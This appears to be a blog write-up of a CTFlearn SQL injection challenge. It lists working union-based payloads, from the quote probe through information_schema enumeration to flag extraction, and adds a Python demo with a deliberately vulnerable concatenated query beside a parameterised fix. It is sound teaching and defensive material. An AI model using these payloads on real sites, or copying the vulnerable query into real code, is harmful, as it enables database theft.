Sunday, December 24, 2023

(My)SQL Injection Attack [Tutorial]

Imagine you're baking a delicious batch of cookies, following your grandma's secret recipe. But then, a mischievous squirrel sneaks in and replaces a pinch of cinnamon with a dash of…mystery powder! That's kind of like an SQL injection (SQLi) attack. Hackers, like mischievous squirrels, exploit website vulnerabilities by sneaking malicious code into user input fields.

This "mystery powder" can trick the website's database (the oven) into baking something entirely different – maybe stealing your recipe, adding unwanted ingredients, or even burning the whole batch!

Thankfully, website bakers have special tools like data validation and locking cabinets to keep their ovens squirrel-proof and cookies safe. So, next time you trust a website with your information, remember: just like you wouldn't share your grandma's secret recipe with a squirrel, be careful what you input online. Keep your digital cookies safe from sneaky squirrels!

Let's crack open the hood of this website and peek at its inner workings, not to exploit weaknesses but to understand the delicate dance between data and security. Think of it as a friendly spelunking expedition through the code caves, unearthing the hidden tunnels and secret chambers that protect precious information. We'll be explorers, not exploiters, mapping the landscape of potential vulnerabilities so developers can equip their online fortresses with sturdier shields and clever traps (figuratively speaking, of course!). It's all about knowledge, not mischief, and like any good spelunker, we'll emerge with a newfound respect for the intricate systems that keep our digital world humming. So, grab your metaphorical helmet and headlamp, and let's embark on this educational adventure!
In this article, we will exploit the Dog Viewer challenge website on CTFlearn. By default, without entering any ID, it displays Name: Saranac for ID: 1, which we can also get through this URL: https://web.ctflearn.com/web8/?id=1.

So, let's enter 2 for ID and hit Submit. Now we get the result Name: Doodle, which can alternatively be obtained by this URL: https://web.ctflearn.com/web8/?id=2. We can enumerate the IDs by incrementing them by 1 each time, and we get valid results for IDs 1, 2, 3, and 4. For invalid IDs like 0, -1, or any value greater than 4, we get 0 results.

Let's begin by checking whether it is vulnerable to SQLi attacks. By giving the ID as 1', we get 0 results (https://web.ctflearn.com/web8/?id=1%27), a sign that the stray quote broke the underlying query rather than being treated as part of a harmless value.

For the query 105 OR 1=1; we get all results, because the injected OR 1=1 makes the WHERE clause true for every row. Good progress!!

Now, let's determine the number of columns required to perform the UNION-based injection attack. First, we try five queries, 105 ORDER BY 1 --, then 105 ORDER BY 2 --, up to 105 ORDER BY 5 --, and get 0 results. Next, we try the query 105 UNION SELECT NULL, then 105 UNION SELECT NULL, NULL, and still get 0 results. For the query 105 UNION SELECT NULL, NULL, NULL, NULL we get a hit, so the original query returns 4 columns, matching the 4 NULLs.

Now we can extract the version with the query 105 UNION SELECT NULL, NULL, @@VERSION, NULL, placing @@VERSION in the third column (the one the page displays), and get the result 5.5.58-0ubuntu0.14.04.1.

From the query 105 UNION SELECT NULL, NULL, table_name, NULL FROM information_schema.tables, we get the table name w0w_y0u_f0und_m3 and the query 105 UNION SELECT NULL, NULL, column_name, NULL FROM information_schema.columns gives us the column name f0und_m3.

Finally, to finish our attack, we query the ID field with 105 UNION SELECT NULL, NULL, f0und_m3, NULL FROM w0w_y0u_f0und_m3 and capture the flag abctf{uni0n_1s_4_gr34t_c0mm4nd}, which can be accessed with the following URL:
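
To see why the probes above behave the way they do, and what the fix looks like, here is an added example (not the challenge's own code, which ran MySQL behind PHP). It rebuilds the shape of the Dog Viewer lookup in Python on an in-memory SQLite database so it runs offline, puts the vulnerable string-concatenated query beside a hardened version, and replays the page's probes against both. The table name dogs, the breed and color columns, and the names for IDs 3 and 4 are constructed; the page only shows Saranac (1) and Doodle (2).

```python
import re
import sqlite3

# Added example, not code from the writeup or the challenge. SQLite stands in
# for the challenge's MySQL 5.5 so the script runs offline; the injection
# mechanics are the same. Table "dogs", its breed/color columns and the rows
# for IDs 3 and 4 are constructed sample data.

FLAG = "abctf{uni0n_1s_4_gr34t_c0mm4nd}"  # value taken from the writeup


def build_db() -> sqlite3.Connection:
    """Build the constructed sample database: a 4-column dogs table plus the
    hidden table the UNION payload on the page reads from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE dogs (id INTEGER, name TEXT, breed TEXT, color TEXT);
        INSERT INTO dogs VALUES (1, 'Saranac', 'Labrador', 'Black');
        INSERT INTO dogs VALUES (2, 'Doodle', 'Poodle', 'White');
        INSERT INTO dogs VALUES (3, 'Constructed3', 'Beagle', 'Brown');
        INSERT INTO dogs VALUES (4, 'Constructed4', 'Husky', 'Grey');
        CREATE TABLE w0w_y0u_f0und_m3 (f0und_m3 TEXT);
        """
    )
    conn.execute("INSERT INTO w0w_y0u_f0und_m3 VALUES (?)", (FLAG,))
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The bug from the writeup: the id parameter is pasted into the SQL text,
    so anything after the number is executed as SQL."""
    sql = f"SELECT id, name, breed, color FROM dogs WHERE id = {user_id}"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        # A syntax error (the stray quote in "1'") is swallowed and surfaces
        # as "0 results", the probe response described on the page.
        return []


ID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")


def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> list:
    """Two independent fixes: reject anything that is not a positive integer,
    then bind the value as a parameter so the driver never treats it as SQL."""
    if not ID_PATTERN.fullmatch(user_id):
        return []
    sql = "SELECT id, name, breed, color FROM dogs WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def run_probes(lookup) -> dict:
    """Replay the page's probes against a lookup function on a fresh DB."""
    conn = build_db()
    probes = {
        "normal": "2",
        "quote": "1'",
        "tautology": "105 OR 1=1",
        "union": "105 UNION SELECT NULL, NULL, f0und_m3, NULL FROM w0w_y0u_f0und_m3",
    }
    return {name: lookup(conn, payload) for name, payload in probes.items()}


if __name__ == "__main__":
    for label, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        for probe, rows in run_probes(fn).items():
            print(f"{label:10} {probe:10} -> {rows}")
```

Running it shows the vulnerable function returning every dog for the tautology and the hidden table's row for the UNION payload, while the hardened function returns only the row for a legitimate ID and nothing for the three probes. The two defences are deliberately independent: the parameterised query alone already stops the injection, and the integer check alone would also stop these payloads, so a mistake in either layer does not reopen the hole.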
